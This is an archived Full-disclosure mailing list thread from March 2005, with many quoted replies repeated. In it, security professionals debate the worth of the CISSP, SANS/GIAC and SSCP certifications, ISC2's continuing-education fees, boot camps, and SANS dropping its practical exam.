Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolved SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even though you see the name GIAC and SANS being used everywhere, they are all trademarks (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public a
RES: [Full-disclosure] CISSP Test
Hi Friends,

What do you think about the CCIE certification model, practice and written tests?

I think that is a good model for Security Certifications.

But can you create practice tests not using specific vendors?

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] on behalf of Vladamir
Sent: Wednesday, 23 March 2005 14:23
To: DAN MORRILL
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] CISSP Test

Very good points, so.. who wants to start writing to the mentioned organizations about this?

DAN MORRILL wrote: > I think in reading the multiple threads on this issue, there are a > number of perspectives on the value of the CISSP. > > What was most interesting was the CEO's perspective. Since the CISSP is > a boot camp, and the SANS is bootcampable in the longer run with the > removal of the practical. The real question is working towards a > certificate that demonstrates ability to work in the security arena, one > that is really hard to get, and one that really tests the ability to do > the work. > > While CISSP and SANS are great to have as a resume filter, it does not > imply that anyone with either certificate to their name can actually do > the work. What I am seeing is that many people are going for these, and > have them, but had them a result from an IDS system, or ask them to do a > security design for either a network or a chunk of code, the ability to > actually perform the task is not there, even though they have the > certificate. > > Personally, I believe the community needs something, certificate, > degree, internship, what ever, that actually means you can perform > competently in the security arena. That there is a skill set there that > the entire community agrees upon is the minimum recommended skill set > to work in this field. If we had something like that, then any school > that is pumping out Bachelors of Information Security folks would have a > standard. Anyone building a bootcamp or certificate program would have > an agreed upon community standard to work with. > > ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with > the community, develop the minimum qualifications to work in the field, > and actually accomplish something once they have been certified or > degreed. NSA has been hugely successful in developing security schools > through James Madison, Boise, et al. But they have to agree to and teach > to the minimum standard that NSA has put together to meet the needs that > NSA has identified. > > I think until we as a community agree upon a minimum standard, apply it > consistently across the board much like doctors, lawyers, social > workers, and other degreed or licensed professionals, we will continue > to have this debate until the house burns down. As security > professionals, as security folks, we have the same ability to either do > good, or do harm as any other profession does. We need to understand > this, and begin working towards skill sets either certificate or degree > that actually mean something useful at the end of the day. > > My thoughts, flames invited. > r/ > Dan > > > > Sometimes MSN E-mail will indicate that the message failed to be > delivered. Please resend when you get those, it does not mean that the > mail box is bad, merely that MSN mail is over worked at the time. > > > > > >> From: "Clement Dupuis" <[EMAIL PROTECTED]> >> To: <[EMAIL PROTECTED]>,"'Vladamir'" >> <[EMAIL PROTECTED]> >> CC: full-disclosure@lists.grok.org.uk >> Subject: RE: [Full-disclosure] CISSP Test >> Date: Wed, 23 Mar 2005 06:45:47 -0500 >> >> Robert E. Lee wrote: >> >> "SANS programs have little to do with security. I'm glad they changed >> their >> policy. They seem more honest now." >> >> Good day Robert, >> >> Honesty is a very neat goal to achieve, however it has many facets. >> >> I lately learned (under all reserve, please correct me if you know >> otherwise) that SANS no longer has any NON PROFIT portion left. They >> used >> to be registered as a non-profit entity in the state of Maryland but it >> seems that it was dissolved. Technically we could say there is no SANS >> Institute left anymore as we knew it on the non profit side. After they >> dissolved SANS they created a FOR PROFIT corporation called ESCAL which >> registered the names used in the non-profit as trademarks for their >> new for >> profit organization. Even though you see the name GIAC and SANS being used >> everywhere, they are all trademarks (not organizations
Re: [Full-disclosure] CISSP Test
Very good points, so.. who wants to start writing to the mentioned organizations about this?

DAN MORRILL wrote: I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP. What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work. While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate. Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agrees upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with. ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified. I think until we as a community agree upon a minimum standard, apply it consistently across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day. My thoughts, flames invited. r/ Dan Sometimes MSN E-mail will indicate that the message failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time.

From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500

Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolved SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even though you see the name GIAC and SANS being used everywhere, they are all trademarks (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity. Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-)
RE: [Full-disclosure] CISSP Test
I think in reading the multiple threads on this issue, there are a number of perspectives on the value of the CISSP.

What was most interesting was the CEO's perspective. Since the CISSP is a boot camp, and the SANS is bootcampable in the longer run with the removal of the practical. The real question is working towards a certificate that demonstrates ability to work in the security arena, one that is really hard to get, and one that really tests the ability to do the work.

While CISSP and SANS are great to have as a resume filter, it does not imply that anyone with either certificate to their name can actually do the work. What I am seeing is that many people are going for these, and have them, but had them a result from an IDS system, or ask them to do a security design for either a network or a chunk of code, the ability to actually perform the task is not there, even though they have the certificate.

Personally, I believe the community needs something, certificate, degree, internship, what ever, that actually means you can perform competently in the security arena. That there is a skill set there that the entire community agrees upon is the minimum recommended skill set to work in this field. If we had something like that, then any school that is pumping out Bachelors of Information Security folks would have a standard. Anyone building a bootcamp or certificate program would have an agreed upon community standard to work with.

ISC2, ISSA, WSA, SANS, et al. Could build a board in conjunction with the community, develop the minimum qualifications to work in the field, and actually accomplish something once they have been certified or degreed. NSA has been hugely successful in developing security schools through James Madison, Boise, et al. But they have to agree to and teach to the minimum standard that NSA has put together to meet the needs that NSA has identified.

I think until we as a community agree upon a minimum standard, apply it consistently across the board much like doctors, lawyers, social workers, and other degreed or licensed professionals, we will continue to have this debate until the house burns down. As security professionals, as security folks, we have the same ability to either do good, or do harm as any other profession does. We need to understand this, and begin working towards skill sets either certificate or degree that actually mean something useful at the end of the day.

My thoughts, flames invited.
r/
Dan

Sometimes MSN E-mail will indicate that the message failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time.

From: "Clement Dupuis" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]>,"'Vladamir'" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] CISSP Test Date: Wed, 23 Mar 2005 06:45:47 -0500

Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now." Good day Robert, Honesty is a very neat goal to achieve, however it has many facets. I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolved SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even though you see the name GIAC and SANS being used everywhere, they are all trademarks (not organizations) of the new privately owned company. Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity. Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-) Take care Clement
RE: [Full-disclosure] CISSP Test
Robert E. Lee wrote: "SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now."

Good day Robert,

Honesty is a very neat goal to achieve, however it has many facets.

I lately learned (under all reserve, please correct me if you know otherwise) that SANS no longer has any NON PROFIT portion left. They used to be registered as a non-profit entity in the state of Maryland but it seems that it was dissolved. Technically we could say there is no SANS Institute left anymore as we knew it on the non profit side. After they dissolved SANS they created a FOR PROFIT corporation called ESCAL which registered the names used in the non-profit as trademarks for their new for profit organization. Even though you see the name GIAC and SANS being used everywhere, they are all trademarks (not organizations) of the new privately owned company.

Principals at SANS have NEVER claimed to be non-profit, it is a myth that we the people that have been dealing with SANS for a long time (since the time they were non profit) have been propagating. We have been keeping this myth alive simply because we did not know any better and we did not know that the non-profit was dissolved. It was done without any noise or public announcement to the people that were already certified. So they NEVER lied but they never went to any length to inform people of the real and current status of their corporation activity.

Most people think that GIAC is non profit which is not the case anymore and this better explains the decision of dropping the practical requirement: it does not generate money and it is not a good business decision to keep something alive that will become a drain on the bottom line. Which is a bit contrary to the reason given of improving the overall state of the security community :-)

Take care
Clement
Re: [Full-disclosure] CISSP Test
Boo yah! Screw college :)

vulcanius wrote: Back in the summer of 2003 I went out to Silicon Valley and met Jeff Snyder, Sen. Vice Pres of Veridian's security sector (now General Dynamics by the way) and I was surprised to find out that a little over half of the employees in their sec. division didn't have any form of college degree, they only had CISSPs.

On Tue, 22 Mar 2005 21:05:44 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: In my opinion, they should do away with "boot camps", they churn out paper CCNAs, paper CISSPs, and they're doing nobody any real good. Why did SANS do away with the practical portion of their (I forgot the name) exam? I read briefly about it, and it looks (well, looked) like a lot of fun, how hard would it be? Set up honey pot w/ snort, ethereal, secured logging server Advertise "insecure machine" Sit back, collect packets, write report. Doesn't sound too hard to me!

Doesn't sound too useful either! But seriously, most of the "security" industry is sadly broken. It's filled with good intentioned people who grossly misunderstand the problem and people just looking to make a buck where ever they can. SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now. If you want to learn about security, start here: http://www.acm.org/classics/sep95/ http://www.nsa.gov/selinux/papers/inevitability/ http://www.radium.ncsc.mil/tpep/library/rainbow/

Robert -- Robert E. Lee CEO, Dyad Security, Inc. W - http://www.dyadsecurity.com E - [EMAIL PROTECTED] M - (949) 394-2033
Re: [Full-disclosure] CISSP Test
** Hrm... seems my first attempt got rejected for "No reason given."

I know that much, I just think it's a bit dumb that the only form of certification/education they had was a CISSP. Not to mention they comprised over half of the sector's employees.

On Wed, 23 Mar 2005 00:54:00 -0500, vulcanius <[EMAIL PROTECTED]> wrote: > I know that much, I just think it's a bit dumb that the only form of > certification/education they had was a CISSP. Not to mention they > comprised over half of the sector's employees. > > > On Tue, 22 Mar 2005 21:52:23 -0800, [EMAIL PROTECTED] > <[EMAIL PROTECTED]> wrote: > > vulcanius([EMAIL PROTECTED])@Wed, Mar 23, 2005 at 12:40:51AM -0500: > > > Back in the summer of 2003 I went out to Silicon Valley and met Jeff > > > Snyder, Sen. Vice Pres of Veridian's security sector (now General > > > Dynamics by the way) and I was surprised to find out that a little > > > over half of the employees in their sec. division didn't have any form > > > of college degree, they only had CISSPs. > > > > IIRC you have to have a certain number of CISSP certified people to bid on > > some government contracts. > > > > Robert > > > > -- > > Robert E. Lee > > CEO, Dyad Security, Inc. > > W - http://www.dyadsecurity.com > > E - [EMAIL PROTECTED] > > M - (949) 394-2033 > >
Re: [Full-disclosure] CISSP Test
I know that much, I just think it's a bit dumb that the only form of certification/education they had was a CISSP. Not to mention they comprised over half of the sector's employees.

On Tue, 22 Mar 2005 21:52:23 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > vulcanius([EMAIL PROTECTED])@Wed, Mar 23, 2005 at 12:40:51AM -0500: > > Back in the summer of 2003 I went out to Silicon Valley and met Jeff > > Snyder, Sen. Vice Pres of Veridian's security sector (now General > > Dynamics by the way) and I was surprised to find out that a little > > over half of the employees in their sec. division didn't have any form > > of college degree, they only had CISSPs. > > IIRC you have to have a certain number of CISSP certified people to bid on > some government contracts. > > Robert > > -- > Robert E. Lee > CEO, Dyad Security, Inc. > W - http://www.dyadsecurity.com > E - [EMAIL PROTECTED] > M - (949) 394-2033 >
Re: [Full-disclosure] CISSP Test
Back in the summer of 2003 I went out to Silicon Valley and met Jeff Snyder, Sen. Vice Pres of Veridian's security sector (now General Dynamics by the way) and I was surprised to find out that a little over half of the employees in their sec. division didn't have any form of college degree, they only had CISSPs.

On Tue, 22 Mar 2005 21:05:44 -0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: > > In my opinion, they should do away with "boot camps", they churn out > > paper CCNAs, paper CISSPs, and they're doing nobody any real good. > > > > Why did SANS do away with the practical portion of their (I forgot the > > name) exam? I read briefly about it, and it looks (well, looked) like a > > lot of fun, how hard would it be? > > > > Set up honey pot w/ snort, ethereal, secured logging server > > Advertise "insecure machine" > > Sit back, collect packets, write report. > > > > Doesn't sound too hard to me! > > Doesn't sound too useful either! > > But seriously, most of the "security" industry is sadly broken. It's filled > with good intentioned people who grossly misunderstand the problem and people > just looking to make a buck where ever they can. > > SANS programs have little to do with security. I'm glad they changed their > policy. They seem more honest now. > > If you want to learn about security, start here: > http://www.acm.org/classics/sep95/ > http://www.nsa.gov/selinux/papers/inevitability/ > http://www.radium.ncsc.mil/tpep/library/rainbow/ > > Robert > > -- > Robert E. Lee > CEO, Dyad Security, Inc. > W - http://www.dyadsecurity.com > E - [EMAIL PROTECTED] > M - (949) 394-2033 >
Re: [Full-disclosure] CISSP Test
Vladamir([EMAIL PROTECTED])@Tue, Mar 22, 2005 at 11:34:35PM -0500: > In my opinion, they should do away with "boot camps", they churn out > paper CCNAs, paper CISSPs, and they're doing nobody any real good. > > Why did SANS do away with the practical portion of their (I forgot the > name) exam? I read briefly about it, and it looks (well, looked) like a > lot of fun, how hard would it be? > > Set up honey pot w/ snort, ethereal, secured logging server > Advertise "insecure machine" > Sit back, collect packets, write report. > > Doesn't sound too hard to me!

Doesn't sound too useful either!

But seriously, most of the "security" industry is sadly broken. It's filled with good intentioned people who grossly misunderstand the problem and people just looking to make a buck where ever they can.

SANS programs have little to do with security. I'm glad they changed their policy. They seem more honest now.

If you want to learn about security, start here:
http://www.acm.org/classics/sep95/
http://www.nsa.gov/selinux/papers/inevitability/
http://www.radium.ncsc.mil/tpep/library/rainbow/

Robert

-- Robert E. Lee CEO, Dyad Security, Inc. W - http://www.dyadsecurity.com E - [EMAIL PROTECTED] M - (949) 394-2033
Re: [Full-disclosure] CISSP Test
In my opinion, they should do away with "boot camps", they churn out paper CCNAs, paper CISSPs, and they're doing nobody any real good.

Why did SANS do away with the practical portion of their (I forgot the name) exam? I read briefly about it, and it looks (well, looked) like a lot of fun, how hard would it be?

Set up honey pot w/ snort, ethereal, secured logging server
Advertise "insecure machine"
Sit back, collect packets, write report.

Doesn't sound too hard to me!

J.A. Terranson wrote: On Tue, 22 Mar 2005, Wade Woolwine wrote: Just a word on the CISSP, you have to have worked in the field for 5 years (3 years with degree) in order to get it...otherwise you'll get the ISC2 associates cert...same exam and after the x years period, you will automatically be grandfathered in to CISSP. Yeah, riiggghhh. If they would actually enforce this requirement, then the CISSP *might* mean something. But they are fully aware of the outright fraudulent CISSPs they are churning out (after all, they get the money either way, why should they be self-policing?) - let's see, how many 18 year olds have 5 years experience??? Now, how many have CISSPs after going to a 1 week "Boot Camp". All of these certifications are now completely worthless, as they all suffer from this defect. And the certifying bodies have brought ruin, rather than respect, to our profession.
Re: [Full-disclosure] CISSP Test
On Tue, 22 Mar 2005, Wade Woolwine wrote:

> Just a word on the CISSP, you have to have worked in the field for 5 years
> (3 years with degree) in order to get it...otherwise you'll get the ISC2
> associates cert...same exam and after the x years period, you will
> automatically be grandfathered in to CISSP.

Yeah, riiggghhh. If they would actually enforce this requirement, then the CISSP *might* mean something. But they are fully aware of the outright fraudulent CISSPs they are churning out (after all, they get the money either way, why should they be self-policing?) - let's see, how many 18-year-olds have 5 years' experience??? Now, how many have CISSPs after going to a 1 week "Boot Camp".

All of these certifications are now completely worthless, as they all suffer from this defect. And the certifying bodies have brought ruin, rather than respect, to our profession.

-- 
Yours,
J.A. Terranson
[EMAIL PROTECTED]
0xBD4A95BF

"Quadriplegics think before they write stupid pointless shit...because they have to type everything with their noses."
http://www.tshirthell.com/
RE: [Full-disclosure] CISSP Test
Good day George,

I will concede with you that ISC2 has had and still has today some inability to communicate effectively with their membership and the community as a whole. Their advertising is aggressive and really makes it look as if you have to buy your CPEs.

There are a multitude of other ways to get CPEs:

You can write new exam questions
You can read a book
You can subscribe to some of the recognized magazines
You can teach others
You can attend seminars or any other form of security training
You can write articles
You can work on the board of a security organization
You can proctor exams
You can most definitely get CPEs for your research if it is published

And the list goes on...

Take care

Clement

Clement Dupuis, CD
CCCure Enterprise Security & Training Inc.
CISSP, GCFW, GCIA, Security+, CEH, CCSA, CCSE, ACE
President/Chief Learning Officer (CLO)
Tel: 954 364 8410 (Florida)
Tel: 819 340 0138 (Quebec)
Fax: 636 773 6328

Maintainer of :
The CISSP and SSCP Open Study Guides Web Site
http://www.cccure.org
The Professional Security Testers Warehouse
http://www.professionalsecuritytesters.org

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of george jetson
Sent: Tuesday, March 22, 2005 4:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] CISSP Test

The CISSP is a valuable certification - to a point, but my gripe is with the staying certified process. ISC2 constantly sends out invitations to get CPEs (basically continuing education credits) for certificate holders to get from 10 to 30 credits towards the required amount of 120 CPEs in 3 yrs, that cost an exorbitant amount. Prices often range from 700+ to nearly 3 grand. At a median price of 1500 bucks for 30 CPEs it would end up costing 6000 dollars over 3 yrs just to stay certified. That in my opinion is just plain stupid.

The CISSP certification started out as a way to establish a certificate holder's knowledge - it has turned into just another money making scheme. I really don't mind having to have CPEs to stay certified but being employed in this field counts as nothing - regardless of the research attached to the position. You have to go "above the norm" or pay for the CPEs. Heck, we all know what goes on at seminars. Bleh, worthless for the most part. Lots of fun but that's about it.

Well that's my 2 cents. flame away
RE: [Full-disclosure] CISSP Test
The CISSP is a valuable certification - to a point, but my gripe is with the staying certified process. ISC2 constantly sends out invitations to get CPEs (basically continuing education credits) for certificate holders to get from 10 to 30 credits towards the required amount of 120 CPEs in 3 yrs, that cost an exorbitant amount. Prices often range from 700+ to nearly 3 grand. At a median price of 1500 bucks for 30 CPEs it would end up costing 6000 dollars over 3 yrs just to stay certified. That in my opinion is just plain stupid.

The CISSP certification started out as a way to establish a certificate holder's knowledge - it has turned into just another money making scheme. I really don't mind having to have CPEs to stay certified but being employed in this field counts as nothing - regardless of the research attached to the position. You have to go "above the norm" or pay for the CPEs. Heck, we all know what goes on at seminars. Bleh, worthless for the most part. Lots of fun but that's about it.

Well that's my 2 cents. flame away
RE: [Full-disclosure] CISSP Test
Rob, if I need to make myself more clear I will. Directly from the ISC2 website:

The CISSP credential is ideal for mid- and senior-level managers who are working toward or have already attained positions as CISOs, CSOs or Senior Security Engineers.

There are three concentrations within the CISSP:

ISSAP - Concentration in Architecture
ISSEP - Concentration in Engineering
ISSMP - Concentration in Management

The SSCP - The SSCP credential is ideal for those working toward or who have already attained positions as Senior Network Security Engineers, Senior Security Systems Analysts or Senior Security Administrators. (Concentrations coming soon!)

The CBK is a comprehensive working knowledge of security as pertains to physical, data, and operational needs of a business.

I have had my CISSP for about 3 years now and must say it has opened doors for me that otherwise would not have opened if it weren't for the certification and the training that comes along with it. I am growing and learning new things daily and it is because of the opportunities that the CISSP credential has provided!!

Very Respectfully,

David Chastain
Re: [Full-disclosure] CISSP Test
The CISSP cert is a great cert to have if you want to get your foot in the door. Some places require you to have the cert as well. It gives the assurance that the holder of the cert is a fairly well rounded security person that understands the concepts, but not necessarily the finer details of implementation. CISSP is basically a 50,000 foot view of IT security as a whole.

The SANS / GIAC exams are better IMHO. Simply due to the fact that they mostly specialize in one field, and require you to complete a practical assignment that enforces the fact that you really know how to make use of the material in a real world situation. BUT, SANS / GIAC has done away with the practical written paper part of the exam as recent as last week. This severely devalues the GIAC certs IMHO. Now any Joe Shmoe that can read a book and memorize said book, will be able to get certified. The practical exam weeded out the "exam-cram" crowd. I understand that some people just couldn't find the time, you have 5 months to write the practical; if you really want the cert you'll find the time.

My only gripe about CISSP is with ISC2, MOST of my spam comes from ISC2. Ok, perhaps not most of it, but a bunch of it. They constantly send crap to me, elections for board of directors (who cares?), this class is coming up (I'm already CISSP, why take another class?), that class is coming up, this thing is happening, that thing is happening... Really who cares? I could care less who the "president" is of ISC2, place Barbie in charge for all I care, I could care less if they have yet another class coming up in my area, I'm already certified, why in the world would I want to take a class to become CISSP) ISC2 says they are non-profit, great, fine, yippee, but what do I get for my $85 per year? I have the cert, that's all I needed, I paid $450 for the privilege to take the exam. Please don't tell me it costs $85 per year to keep track of my CPEs. If it does I'll keep track of them myself on a piece of 3 cent paper thank you very much.

SANS doesn't charge me a yearly fee for my GCIH, but I do have to be re-tested every 2 years at a cost of $120... not unreasonable if you ask me

Exibar

----- Original Message -----
From: "adeel hussain" <[EMAIL PROTECTED]>
To:
Sent: Tuesday, March 22, 2005 11:37 AM
Subject: RE: [Full-disclosure] CISSP Test

> Hello Vladamir,
>
> To answer your question, yes the CISSP is worth it. However it is
> only worth it due to the public's misconception of what it is.
>
> The CISSP certification basically shows that you have a base
> understanding of the primary concepts across what are widely regarded
> as all the major areas of IT security knowledge (known as the Common
> Body of Knowledge or CBK). This is a good thing if you are, or aspire
> to be, in a management position.
>
> Unfortunately the common perception of the CISSP by most non-IT
> security people (which includes HR staff) is that someone who is a
> CISSP is capable and competent in all areas of IT security. Add to
> that the belief it is the best (or only) security certification they
> are aware of and it becomes "the" security certification in their
> eyes.
>
> I have seen many job descriptions in my time and in the last few years
> it is rare to find one that does not either require or desire the
> CISSP.
>
> As for other certifications, the SANS certs are quite good although, I
> believe, they are about to get devalued by the removal of the
> practical requirement. I would recommend getting the CISSP, maybe the
> GSEC (SANS security essentials cert) and then focusing on certs for
> products/systems within the area you will be working in. But
> remember, the cert is just the starting point and the resume's foot in
> the door. You need to study and get as much hands on as you can to
> actually learn your chosen trade.
>
> Good Luck,
>
> Adeel
Re: [Full-disclosure] CISSP Test
agreed on the devaluing of the GIACs. SANS is really making a big mistake and angering 7000 Security Professionals. The three "crown jewels" as I see them are CISSP, SANS GIAC (with practical) and CISM/CISA. Get any of those combined with solid experience and you're in. A CISSP is basically becoming like the MCSE these days.

Scott Renna
CISSP, GCIA, GCIH <---Practical
Security Team Lead

On Tue, 22 Mar 2005 11:37:45 -0500 adeel hussain <[EMAIL PROTECTED]> wrote:
> Hello Vladamir,
>
> To answer your question, yes the CISSP is worth it. However it is
> only worth it due to the public's misconception of what it is.
>
> The CISSP certification basically shows that you have a base
> understanding of the primary concepts across what are widely regarded
> as all the major areas of IT security knowledge (known as the Common
> Body of Knowledge or CBK). This is a good thing if you are, or aspire
> to be, in a management position.
>
> Unfortunately the common perception of the CISSP by most non-IT
> security people (which includes HR staff) is that someone who is a
> CISSP is capable and competent in all areas of IT security. Add to
> that the belief it is the best (or only) security certification they
> are aware of and it becomes "the" security certification in their
> eyes.
>
> I have seen many job descriptions in my time and in the last few years
> it is rare to find one that does not either require or desire the
> CISSP.
>
> As for other certifications, the SANS certs are quite good although, I
> believe, they are about to get devalued by the removal of the
> practical requirement. I would recommend getting the CISSP, maybe the
> GSEC (SANS security essentials cert) and then focusing on certs for
> products/systems within the area you will be working in. But
> remember, the cert is just the starting point and the resume's foot in
> the door. You need to study and get as much hands on as you can to
> actually learn your chosen trade.
>
> Good Luck,
>
> Adeel
RE: [Full-disclosure] CISSP Test
No, CISSP is not more for management and I'm sure ISC2 would take exception to that, especially when they have a concentration for management.

Robert

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David Chastain
Sent: Tuesday, March 22, 2005 12:04 PM
To: Vladamir
Cc: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] CISSP Test

To reiterate, CISSP is more for management...If you want a more thorough understanding of secure networks, platforms -- Go for the SSCP!

David Chastain, CISSP

On Tuesday, March 22, 2005, at 08:06AM, Vladamir <[EMAIL PROTECTED]> wrote:

>Wow, thanks a lot. I'll pick the book back up, I have read about a lot
>of "clueless" CISSPs, this one gentleman I spoke with (Who is a CISSP)
>said that OpenBSD is easily remotely exploitable, it made me question
>the integrity of this gentleman and the process in which one becomes a
>CISSP (Assuming it has to do with thorough understanding of secure
>networks, platforms, etc)
>
>What are some of the other Computer/Network security exams that are good
>for showing a thorough understanding of the concepts?
>
>Wade Woolwine wrote:
>> Agreed with Robert on this one. It's pretty much a sure-fire way to get
>> your foot in the door...esp. if you're dealing with Gov. contractors or
>> the Gov. itself. Once you have the job, if you don't have the skills, you
>> won't last long. I figure 90% of the job battle is actually getting
>> through the HR folks who look over resumes checking off boxes in a
>> checklist to see if you qualify - certs/education and of course experience
>> will fill all those check lists.
>>
>> wade
RE: [Full-disclosure] CISSP Test
Hello Vladamir,

To answer your question, yes the CISSP is worth it. However it is only worth it due to the public's misconception of what it is.

The CISSP certification basically shows that you have a base understanding of the primary concepts across what are widely regarded as all the major areas of IT security knowledge (known as the Common Body of Knowledge or CBK). This is a good thing if you are, or aspire to be, in a management position.

Unfortunately the common perception of the CISSP by most non-IT security people (which includes HR staff) is that someone who is a CISSP is capable and competent in all areas of IT security. Add to that the belief it is the best (or only) security certification they are aware of and it becomes "the" security certification in their eyes.

I have seen many job descriptions in my time and in the last few years it is rare to find one that does not either require or desire the CISSP.

As for other certifications, the SANS certs are quite good although, I believe, they are about to get devalued by the removal of the practical requirement. I would recommend getting the CISSP, maybe the GSEC (SANS security essentials cert) and then focusing on certs for products/systems within the area you will be working in. But remember, the cert is just the starting point and the resume's foot in the door. You need to study and get as much hands on as you can to actually learn your chosen trade.

Good Luck,

Adeel
Re: [Full-disclosure] CISSP Test
To reiterate, CISSP is more for management...If you want a more thorough understanding of secure networks, platforms -- Go for the SSCP!

David Chastain, CISSP

On Tuesday, March 22, 2005, at 08:06AM, Vladamir <[EMAIL PROTECTED]> wrote:

>Wow, thanks a lot. I'll pick the book back up, I have read about a lot
>of "clueless" CISSPs, this one gentleman I spoke with (Who is a CISSP)
>said that OpenBSD is easily remotely exploitable, it made me question
>the integrity of this gentleman and the process in which one becomes a
>CISSP (Assuming it has to do with thorough understanding of secure
>networks, platforms, etc)
>
>What are some of the other Computer/Network security exams that are good
>for showing a thorough understanding of the concepts?
>
>Wade Woolwine wrote:
>> Agreed with Robert on this one. It's pretty much a sure-fire way to get
>> your foot in the door...esp. if you're dealing with Gov. contractors or
>> the Gov. itself. Once you have the job, if you don't have the skills, you
>> won't last long. I figure 90% of the job battle is actually getting
>> through the HR folks who look over resumes checking off boxes in a
>> checklist to see if you qualify - certs/education and of course experience
>> will fill all those check lists.
>>
>> wade
Re: [Full-disclosure] CISSP Test
Exactly, although the test was much easier than everyone made it out to be. Or I over studied, not sure which is true. I have a few years in the sec field under my belt and decided to get it just to have it. Kind of, I have the skills and here is the proof, for management. I think it is a worthy investment especially if you're looking for a new job with the current market in the US anyway.

On Tuesday 22 March 2005 09:41, Forbes, Robert R wrote:
> Many companies that know little or nothing about security, which means a
> lot of them, use the CISSP as the "benchmark" for determining if they
> will even interview you for a position so from that standpoint it is
> good to have. The test is good for showing you have a good overall grasp
> of the security concepts that you would want a security professional
> to have but as always I wouldn't rely on the fact that someone was
> certified to decide if I was going to hire them.
>
> My .02
>
> Robert
>
> -----Original Message-----
> From: [EMAIL PROTECTED]
